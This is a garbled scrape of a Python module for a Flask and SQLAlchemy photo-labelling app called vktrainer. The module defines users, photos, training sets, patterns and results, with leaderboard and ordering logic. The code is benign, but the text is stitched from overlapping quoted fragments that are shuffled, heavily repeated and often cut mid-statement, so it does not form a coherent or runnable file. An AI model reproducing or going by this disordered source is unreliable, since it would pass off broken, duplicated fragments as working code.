self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want", "copyfile from flask import url_for, current_app as app from flask_login import UserMixin from", "}, 'user': self.user.name if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(),", "any results If there aren't any, we serve a random photo \"\"\" photos_without_results", "already exists in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if", "def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in semi random", "= db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True):", "import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class", "We are already at the last photo, we show the first one next_photo", "there aren't any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id)", "db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name):", "random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id", "TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction", "primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self):", "return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any", "db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo =", "def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any results If", "class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer,", "user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user", "return None # We copy the file _, filename = os.path.split(file) path =", "app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING']", "'value': {}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user':", "func, desc # from vktrainer import db, app, login_manager from vktrainer import db,", "import UserMixin from sqlalchemy import func, desc # from vktrainer import db, app,", "photo in semi random mode (breaks UX) return None class TrainingPattern(db.Model): id =", "We copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5)", "check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None # We", "db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic'))", "return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return", "'user': self.user.name if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), }", "} return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if", "id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction =", "return user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first()", "vktrainer import db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer,", "self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result", "one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a", "db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return", "} @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo,", "next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: #", "class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo',", "def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self,", "get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count),", "'value': loaded_result, } else: result = { 'state': 'KO', 'value': {}, } return", "coding: utf-8 -*- import json import os import random from shutil import copyfile", "id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets',", "id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def", "allow previous photo in semi random mode (breaks UX) return None class TrainingPattern(db.Model):", "self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def", "= db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored", "db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name =", "@classmethod def create_from_file(cls, file, check_if_exists=True): # We check no photo with the same", "/ nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else:", "User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture", "id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id", "if loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else: result =", "photo): \"\"\" We serve a random photo without any results If there aren't", "We are already at the first photo, we show the last one previous_photo", "db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo')", "result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def", "= self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo):", "db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from", "< photo.id).order_by('-id').first() if not previous_photo: # We are already at the first photo,", "# Could not decode JSON loaded_result = None if loaded_result: result = {", "at the last photo, we show the first one next_photo = self.photos.order_by('id').first() return", "self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name", "photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0,", "random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't", "try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id =", "random from shutil import copyfile from flask import url_for, current_app as app from", "nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return", "loaded_result = None if loaded_result: result = { 'state': 'OK', 'value': loaded_result, }", "login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer,", "create_from_file(cls, file, check_if_exists=True): # We check no photo with the same md5 already", "if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo", "pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id", "user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader", "UserMixin from sqlalchemy import func, desc # from vktrainer import db, app, login_manager", "= photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results -", "= db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self):", "copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit()", ").values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos =", "db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in", "db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER =", "{}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id =", "from flask_login import UserMixin from sqlalchemy import func, desc # from vktrainer import", "if not next_photo: # We are already at the last photo, we show", "db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer,", "from shutil import copyfile from flask import url_for, current_app as app from flask_login", "self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result, 'id': self.id, 'url':", "db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True)", "db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return", "get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self,", "= db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def", "else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not", "else: try: loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON loaded_result", "url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos =", "= os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name,", "semi random mode (breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True)", "not decode JSON loaded_result = None if loaded_result: result = { 'state': 'OK',", "= Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5)", "def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result", "last photo, we show the first one next_photo = self.photos.order_by('id').first() return next_photo def", "db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect =", "photo, we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self,", "db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results',", "# We are already at the last photo, we show the first one", "db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer,", "desc # from vktrainer import db, app, login_manager from vktrainer import db, login_manager", "@classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set,", "{ 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result':", "def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We", "= { 'state': 'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name,", "self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already at the first", "self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without", "lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return", "nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow", "check_if_exists=True): # We check no photo with the same md5 already exists in", "== userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture =", "url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count", "photo with the same md5 already exists in db md5 = get_md5(file) if", "= db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text)", "name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref =", "try: loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON loaded_result =", "the same md5 already exists in db md5 = get_md5(file) if check_if_exists: photo", "TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))", "not previous_photo: # We are already at the first photo, we show the", "PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check no photo", "md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo)", "get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin,", "not user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False", "= db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns',", "the first photo, we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo", "exists in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo", "db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref", ") def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results)", "= func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name,", "db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id',", "nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0,", "__repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if", "photo.id).order_by('-id').first() if not previous_photo: # We are already at the first photo, we", "utf-8 -*- import json import os import random from shutil import copyfile from", "self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def", "db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not", "photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs", "to allow previous photo in semi random mode (breaks UX) return None class", "# We check no photo with the same md5 already exists in db", "we show the first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo):", "import db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils import get_md5", "User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name", "db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils import get_md5 photos", "db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id", "show the first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo", "a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results =", "{ 'state': 'OK', 'value': loaded_result, } else: result = { 'state': 'KO', 'value':", "'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, },", "def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name =", "same md5 already exists in db md5 = get_md5(file) if check_if_exists: photo =", "next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first()", "return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo", "if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if", "= db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check", "= self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] ==", "\"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id)", "def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return", "os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5,", "self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: #", "result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result) db.session.commit()", "return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class", "= db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try:", "next_photo: # We are already at the last photo, we show the first", "photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self):", "photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results", "at the first photo, we show the last one previous_photo = self.photos.order_by('-id').first() return", "cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path)", "return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return", "class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return", "_get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in semi random mode", "if not user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user,", "'state': 'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id,", "def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name", "{}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name", "db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name", "else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else:", "loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON loaded_result = None", "picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return", "TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id))", "training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect'", "with the same md5 already exists in db md5 = get_md5(file) if check_if_exists:", "get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id =", "picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file,", "training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs )", "== name).first() if not user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True", "we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo):", "random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to", "app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo =", ").add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results", "db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined',", "os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return", "self.training_results.all()] def get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id,", "return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self):", "return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo:", "we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo:", "= db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER", "= 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check no photo with", "= photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count()", "marked as incorrect' else: try: loaded_result = json.loads(self.result) except ValueError: # Could not", "photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)]", "count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results =", "in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id,", "def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()]", "User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count()", "db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set", "lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) #", "self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user:", "# -*- coding: utf-8 -*- import json import os import random from shutil", ".patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class", "self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self):", "!= photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else:", "Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result',", "position = db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref]", "def __repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first()", "> photo.id).order_by('id').first() if not next_photo: # We are already at the last photo,", "'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id)", "photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result", "db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set',", ")) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results:", "app, login_manager from vktrainer import db, login_manager from vktrainer.utils import get_md5 photos =", "return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer,", "login_manager from vktrainer import db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos',", "pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self):", "= db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self):", "url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr", "the first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo =", "return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos", "def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown", "db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def", "db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result =", "name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod", "Could not decode JSON loaded_result = None if loaded_result: result = { 'state':", "return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not", "func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count,", "as app from flask_login import UserMixin from sqlalchemy import func, desc # from", "JSON loaded_result = None if loaded_result: result = { 'state': 'OK', 'value': loaded_result,", "random mode (breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id", "photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos -", "{ 'state': 'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name, 'id':", "default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect:", "name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', 